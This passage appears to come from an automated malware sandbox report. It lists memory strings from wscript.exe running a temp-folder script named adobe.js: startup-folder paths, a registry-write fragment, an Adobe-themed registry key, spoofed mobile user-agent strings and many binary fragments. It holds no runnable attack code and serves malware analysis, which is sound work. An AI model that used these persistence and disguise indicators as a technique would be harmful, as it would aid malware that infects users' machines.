                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jssjmemstr_6a52b05a-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsnmemstr_8583668c-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsimemstr_d1e6af91-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21770memstr_e28e12dd-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (non)standard marshaling for iwbemobjectsink2memstr_c38d7b9d-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcememstr_e9d8cf98-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)\microsoft onedrive\onedrive.exe,1memstr_786663cb-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcec:\program files (x86)\microsoft onedrive\onedrive.exe,1memstr_b957b7c2-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s-tc:\users\user\appdata\local\temp\adobe.jsmemstr_6e260bd3-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites\desktop.inimemstr_a0b69442-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsmemstr_5c637ca7-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ondemandconnroutehelper.dllxmemstr_2fc3c73b-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: js_szmemstr_27d62e33-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeathsqmemstr_169525ba-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeell3kmemstr_c4994c22-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common startuphmemstr_ec83464d-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobeesp_memstr_4adf02a7-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userp_memstr_3e337251-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: egreadl38memstr_913014d8-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobe.js7memstr_bbf85663-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 15hoodsmemstr_22ea8636-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progrmemstr_e8ff0a9c-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program@memstr_eac790d4-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indowsmemstr_1229041e-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows@memstr_09832748-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_7a155e3e-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startuphmemstr_6551acd4-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup@shell32.dll,-21787memstr_05455745-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $\rmiomemstr_dc7ecdd6-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\jon`#8memstr_66e8a516-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jschine\software\adobe\".memstr_2321f2d9-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup\desktop.inimemstr_1b7e37ba-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\adobe\".memstr_d4b3578e-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\printer shortcutsmemstr_a183a61a-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe(memstr_5e6eb6e8-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\jon@"8memstr_66375936-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsmemstr_4e941cd5-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobememstr_60c992c8-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jc:\windows\system32\wbem\wbemdisp.tlbmemstr_1f50c967-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windows\printermemstr_5f6924b1-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"kmemstr_31f754a7-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \rxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ssesamemstr_ac4af16e-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $]rmicmemstr_0a36fcb4-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"programsmemstr_a0e86b37-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\desktop.ini;memstr_b6807b51-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"tcuts1memstr_86d80e63-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programsmemstr_c0456120-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %utc:\users\user\appdata\local\temp\adobe.jstar menu\pmemstr_625355d3-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roftmemstr_f66c286c-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\network shortcutsmemstr_efcd9c9f-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~1gzetmemstr_467e82c0-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop@shell32.dll,-21769memstr_d8a4b684-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1memstr_0f288a23-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: micros~1dmemstr_630b795f-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pr1microsoftmemstr_fee02dc7-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1gzctmemstr_5b2295d6-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cwindowsmemstr_df668f9a-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printe~1memstr_40c41996-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printe~1tmemstr_2dd34b7a-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printer shortcutsmemstr_87ba3855-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: templa~1memstr_d6829948-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: templa~1dmemstr_95775068-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: networ~1memstr_9e265734-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: networ~1tmemstr_311d4e05-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: network shortcutsmemstr_765a7e95-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startm~1memstr_46fede26-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startm~1nmemstr_c933d747-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [localizedfilenamesmemstr_cedecfa1-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrive.lnkonedrivememstr_ee69b300-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21782memstr_b7ed74dd-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: immersive control panel.lnk@%systemroot%\immersivecontrolpanel\systemsettings.exe,-650memstr_4ff982f6-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progra~3humemstr_2ac1ea08-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell3memstr_cd350825-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cros~1memstr_2870e8de-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cros~1dimemstr_aacf88d0-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rogrammemstr_01549c69-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menu@shell32.dll,-2memstr_4474c25e-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documents.memstr_6d17ca7b-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "wshshell.regwritektopzmt.memstr_d32fb8b9-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ntmarta.dlllmemstr_0f785d1c-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favoritesmemstr_83dce664-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;?onesmemstr_62a97fb6-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdamemstr_3c9bb946-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favorites@shell32.dll,-21796memstr_2f584c8f-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1gzetmemstr_80de97a9-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favori~1memstr_bcaed2ef-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favori~1lmemstr_64299c55-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^gzet.memstr_0256d790-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 202 (,memstr_9094754a-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7t;h0h<memstr_7b091645-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7$3t memstr_b7157261-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0|2l#89memstr_562d9fab-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )\8t*memstr_af45a89d-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d7l4d=memstr_b18b91fc-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8@1l$d=memstr_ed2eb96b-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/4.0 (compatible; msie 8.0; windows phone os 7.5; trident/4.0; iemobile/8.0)memstr_b0627150-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0)memstr_4a283e6c-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l|v0[memstr_1bcf52e1-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdj|imemstr_a7da49f5-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [|utzmemstr_f20920c6-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z\fdkxiamemstr_d7e3a750-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elw`kmemstr_b6336139-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [tqpymemstr_155611b3-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x@tx-<ydsmemstr_309d11ff-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j,x \memstr_08018211-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xdelz8&memstr_e2fbc1a7-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uodw0w`xmemstr_1900cf47-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@[@\@]@^@_@`@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@{@|@}@~@memstr_1c2ae218-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)memstr_2e2a5701-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)tmemstr_97ac5dde-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows phone 8.0; trident/6.0; iemobile/10.0; arm; touch)memstr_28326361-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like geckomemstr_6bd6bfae-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like gecko2memstr_468c3ca8-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (windows phone 10.0; android 6.0.1) applewebkit/537.36 (khtml, like gecko) chrome/70.0.3538.102 mobile safari/537.36 edge/18.19045memstr_e53349db-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t.@0nmemstr_2740ffcc-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: center2m32\wbem\wbemdisp.tlbhmemstr_4236d17f-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $8l`tmemstr_3ef8cef7-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 t x memstr_11a5da81-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !0!p!p!memstr_bb760d2f-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "8"`"memstr_933353c5-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #@#l#memstr_c1ded478-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $($h$l$memstr_4b2ce6da-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %d%p%memstr_b01d062f-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &,&l&t&memstr_589f4d42-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: & 'p'p'memstr_bf9bd321-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '( (@(l(memstr_48c9f98c-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ($)h)l)memstr_105dbf22-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *(*l*t*memstr_69d957fd-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +<+h+memstr_299dcdbf-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +,0,x,memstr_f0d0169b-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fax recipient.lnk@%systemroot%\system32\fxsresm.dll,-120memstr_8427faf9-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mail recipient.mapimail@sendmail.dll,-4memstr_80d900b0-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop (create shortcut).desklink@sendmail.dll,-21memstr_cd468663-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: compressed (zipped) folder.zfsendtotarget@zipfldr.dll,-10148memstr_baa1a309-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents.mydocs@shell32.dll,-34575memstr_77b0e891-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bluetooth file transfer.lnk@c:\windows\system32\fsquirt.exe,-2343memstr_5126b660-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1cw+^memstr_5430c520-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendtomemstr_1ac2bcad-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendto>memstr_973d3884-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kzsendtomemstr_77f12941-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1gzetmemstr_7d3fba82-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recent>memstr_14a166de-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gzctgzet.memstr_44c572f8-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gzctgzet.(memstr_debf1ef0-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programsjmemstr_560de311-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startuphmemstr_fc3f697c-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup@shell32.dll,-21787memstr_a937b204-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'n3405117-memstr_67f87594-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00`amemstr_8ef33666-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00memstr_c80f3773-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roamimemstr_58a25e18-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: js_szssmemstr_fd9941e1-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eg_sze3memstr_17db54bb-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersfilesfoldermemstr_625fcdec-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2025adobepr1mmemstr_c00b086c-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobememstr_7c5d5751-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: errornts^memstr_9148842e-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: typeerroritememstr_eef73547-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adobermemstr_378610cd-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @shell32,dll,-12692qmemstr_ec5c0da0-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}wmemstr_01bb7ba5-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nes@amemstr_80f3e96f-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}ememstr_992b09ee-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}ememstr_28741046-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}prmemstr_d44b3a07-2
